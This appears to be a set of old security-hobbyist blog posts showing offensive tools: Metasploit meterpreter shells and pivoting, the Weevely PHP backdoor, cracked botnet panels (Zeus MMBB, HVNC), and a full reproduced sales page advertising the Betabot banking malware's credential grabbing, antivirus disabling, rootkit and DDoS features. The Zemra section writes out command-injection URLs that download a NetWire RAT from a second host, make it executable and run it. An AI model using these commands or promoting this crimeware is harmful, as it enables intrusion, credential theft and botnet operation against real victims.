pivoting and port forwarding with linux meterpreter

I decided to make a quick video showing linux meterpreter pivoting and also port forwarding ssh.
http://youtu.be/EAZLRADv4HU

Inside Betabot Panel Version 1.7.0.1

Betabot is a publicly sold bot. It is priced competitively at $500.00 BTC/LTC/Perfect Money as of 5-10-2014. The 1.7.0.1 panel requires ionCube Loader 5.4 also the bot does not come with a builder just binary file that can be locked up to 16 domains. Betabot has a formgrabber for Internet Explorer, Firefox, chrome but unlike most bank bots Betabot does not have web-injects. Though Betabot can force Internet explorer to be the default browser that could allow cracked legacy banking bots such as Zeus, SpyEye, ICE IX, Citadel, Carberp to have a new prolonged life. Also note plugins are planed in the future and will cost additional money.
I have made the following video on my YouTube channel showing 1.7.0.1 Panel.
 http://youtu.be/fSPaiTlt_UA



Sales Page

Core Features

• Form Grabber
  When specified sites are detected, Betabot will pull any relevant forms as they are sent, and export details to the main panel. In order for the Form Grabber to work, you must specify filters on the panel. When creating filters, the use of wildcards (*) are supported.
  
  • FireFox (Normal and SSL and SPDY)
  • Internet Explorer (Normal and SSL)
  • Google Chrome (Normal and SSL)
• x86/64 Userkit
  Userland rootkit for both 32 bit and 64 bit systems allows the bot to remain untouchable to other bots and basic user interference. Innovative technique for intercepting system calls on x86 systems allows for better compatibility with other bots. All hooks made will be restored if removed and general unhooker removes 3rd party hooks on sensitive NT service stubs.
• AntiVirus Disabler
  Using multiple methods removal methods, Betabot is able to remove or disable over 30 different Anti Viruses from user mode. On Vista and 7, elevation is required for this function to work properly. To help achieve maximum efficiency, a custom social engineering tactic (written in 12 languages) is used to trick the user into elevating the bot process. This method has proven to be roughly 70% - 80% effective when attempting to elevate privileges.
  
  
  Click here to view complete list of anti-viruses disabled
• Anti-Malware (Botkiller)
  Complex heuristic-based anti-malware component allows for thorough removal of not only major/common malware used in PPI ventures and more. Suspicious autostart items, files, processes and injected code will be removed/disabled when possible. Special options to target BTC/LTC miners is available.
• DNS Blocker/Redirector
  The domain name modifier allows domains to be forced to resolve to any IP provided, or flat out blocked. All popular browsers/desktop applications supported.
• Live FTP/POP3 grabber
  Network data interception allows FTP and POP3 logins over non-SSL connections to be intercepted and recorded in real time. Additionally, SSH logins made from PuTTY client are recorded and reported to the server.
• File Search
  Ability to search all files on local hard disks for certain terms or files with certain names/extensions. Additionally, directories can be excluded from the search. Files matching search parameters will be uploaded to the C2 server.
• Proactive Defense Mode
  Special self-defense mode that can be toggled on and off. When turned on, this will block most known methods of code injection and other malware-related activity to ensure only betabot is in control.
• General bot defense
  Using a myriad of different concepts, betabot protects itself from removal/tampering. Areas of protection include process, autostart and file protection. Betabot is highly resistant to code injection, file removal and unhooking.
• Additional features:
  
  
  • File Size < 150kb
    
  • Config Editor to edit builds -- Change group names
    
  • Block Bootkit Installation of some Bootkits (Mainly Rovnix(Carberp)). Can be toggled on/off from the panel.
    
  • Multi Server Support for up to 16 different servers. Different configurations are possible for each individual server.
    
  • Four different DDoS methods. Various settings to change. Uses local information to attempt to randomize headers in HTTP Floods.
       UDP
       Rapid Connect/Disconnect
       HTTP GET
       Slowloris
    
    
  • Experimental Ruskill - Using an active Sandbox-like, Betabot will attempt to sequester specified programs and roll back any changes made by them after Running. This feature is currently in development and may not work on some bots.
    
  • USB Autorun - When enabled, Betabot will add itself to any USB drive inserted into the machine using LNK-File swap techniques.
    
  • SOCKS4 Server - Turn your bots into dedicated SOCKS4 proxies. You may set the port as well as the duration. Supports UPnP.
    
  • FTP Stealer harvests live FTP logins as they happen in real time.
    
  • Anti Virus Checker allows you to enter your Scan4You account info into the panel and makes use of the S4Y API for quick and easy scanning, straight from your own panel.
    
  • Various Rudimentary Antis To help maintain the integrity of Beta Bot and to protect various pieces of vital code, Beta Bot makes use of multiple anti debugging and anti dumping methods.
    
  • Download / Update / Uninstall / etc - Basic commands expected of all bots. Supports DLLs and JAR files.
    
  • Execute system shell commands
    
  • Additional User Accounts - Ability to create additional user accounts to access your panel. Fully customizable access levels.
    
  • Advanced Search Options to locate specific bots quickly and easily.

Ubuntu 12.04 LTS meterpreter shell

Just wanted show how to use msfpayload to generate a linux meterpeter bind shell as a exe binary file.This requires the victim/user to run and execute the malicious exe file. Tested on Ubuntu 12.04 LTS
Video:http://youtu.be/FpPE3C4Q1TU

Windows metasploit shell upgrade to a meterpreter shell Metasploit tip

I wanted show how to upgrade a standard Metasploit Windows shell to a meterpreter shell.
 Once you have Metasploit Windows shell simply type sessions -l to list all sessions. Find the session you wish to upgrade with its number and type sessions -u session number.
Video: http://youtu.be/UdFwRGdoAsU

Weevely PHP Backdoor

Weevely is a great tool found in Kali. Weevely creates a password protected php backdoor. I wanted to show the basics of using Weevely in my video.
Weevely video link:http://youtu.be/tKUynA5Is1Y

Generating a metasploit php meterpreter bind shell

I wanted to cover how to generate a metasploit php meterpreter bind shell. You have to visit the url where you uploaded your bind meterpreter shell to activate it. You don't have to specify a path to the shell just remote hosts ip is required. Anyone with metasploit can use that bind shell. It's best if you use a reverse shell if your going to use php meterpreter shell. I will cover a more secure shell Weevely that requires a password.
video link:http://youtu.be/lo_LrMaNcS8

Zemra web panel hack with NetWIRE

Found a exploit for Zemra and used netwire to hack the Zemra web panel.

commands

wget downloads testlinux.out NetWire to the current directory http://192.168.56.141/zemra/system/
 http://192.168.56.141/zemra/system/command.php?cmd=wget http://192.168.56.207/testlinux.out



chmod 777 makes it possible to execute testlinux.out NetWire RAT
http://192.168.56.141/zemra/system/command.php?cmd=chmod 777 testlinux.out


./testlinux.out simply executes NetWire RAT
http://192.168.56.141/zemra/system/command.php?cmd=./testlinux.out

NetWire RAT:http://www.worldwiredlabs.com/netwire
Exploit:http://www.1337day.com/exploit/21663
My Video:http://youtu.be/w3Eo7HI8Bbk

HTTP Traffic 1.2 traffic generator

I downloaded HTTP Traffic 1.2 a jquery script that you can run on your local browser and tested it on my test blog testtraffic185.blogspot.com. I started out with 1 page view after running the tool I had 49 page views in Google stats.
video link http://youtu.be/RdK3wCbghSk

Sandboxie and meterpreter

Windows XP SP3 support ends April 8th, 2014. This is not good for people who are forced to use Windows XP at work. I decided to make a video showing a old CVE-2010-2568 exploit. The exploit worked and delivered a Metasploit reverse meterpreter tcp payload. The payload executed in the sandbox as soon as I terminated the programs in the sandbox the meterpeter session dies. I tried in meterpreter session to get getprivs and getsystem but they were blocked by Sandboxie. Sandboxie also prevented me from migrating the process. But I was able to download and upload files in the meterpreter session and get a shell so Sandboxie only minimizes the damage. Without Sandboxie everything worked as you would expect. Anyway this solution is only for those who are forced to use outdated software.

CVE-2010-2568 Exploit  http://www.exploit-db.com/exploits/14403/
You can get Sandboxie at http://www.sandboxie.com/index.php?DownloadSandboxie
Anyway this is my video http://youtu.be/3QVDIkXeRrc

HVNC (hidden vnc bot)

Tested this bot in a local network in vmware. Bot can have a hidden vnc session which is invisible to the user or a visible session like metasploit. This is probably a rip off leaked Zeus source code but their are new features such as capturing video from a webcam and password protection on vnc bot sessions unlike Zeus.
Check out the video at http://youtu.be/s3BGsata6Ow

Cracked VPSProxy Gold 2.5.0

I decided to show Cracked VPSProxy Gold 2.5.0 to give people an idea of how blackhats can tunnel their http and https traffic through a php backdoor or a chain of backdoors. They can even use a proxy before they connect to the php backdoors. I tested using Windows XP SP3 with cracked VPSProxy Gold 2.5.0 and used Kali as the server hosting the backdoor test.php.
Check the video out http://youtu.be/5a_IW7amGSQ

Zeus 2.7.6.8 Panel MMBB

The simplest way to test MMBB install wamp http://www.wampserver.com/en/ on Windows XP or higher vm.

Panel requires ioncube
http://downloads3.ioncube.com/loader_...

Bot only works as localhost! Attention skids take note skip this bot unless you can get it working with Tor yourself.

Only using localhost makes sense if want to use something like torifier
http://ratnetw0rk.blogspot.com/p/setu... such as in this video http://youtu.be/71pZd26Ogww

Bot version is Zeus 2.9.6.1
MMBB injects on IE 8 and Firefox 26 on windows xp sp3

VNC back connect works tested bk.exe server on windows 8.1

Zeus 2.7.6.8 MMBB Control Panel  video

http://youtu.be/RNgT2DkNSWk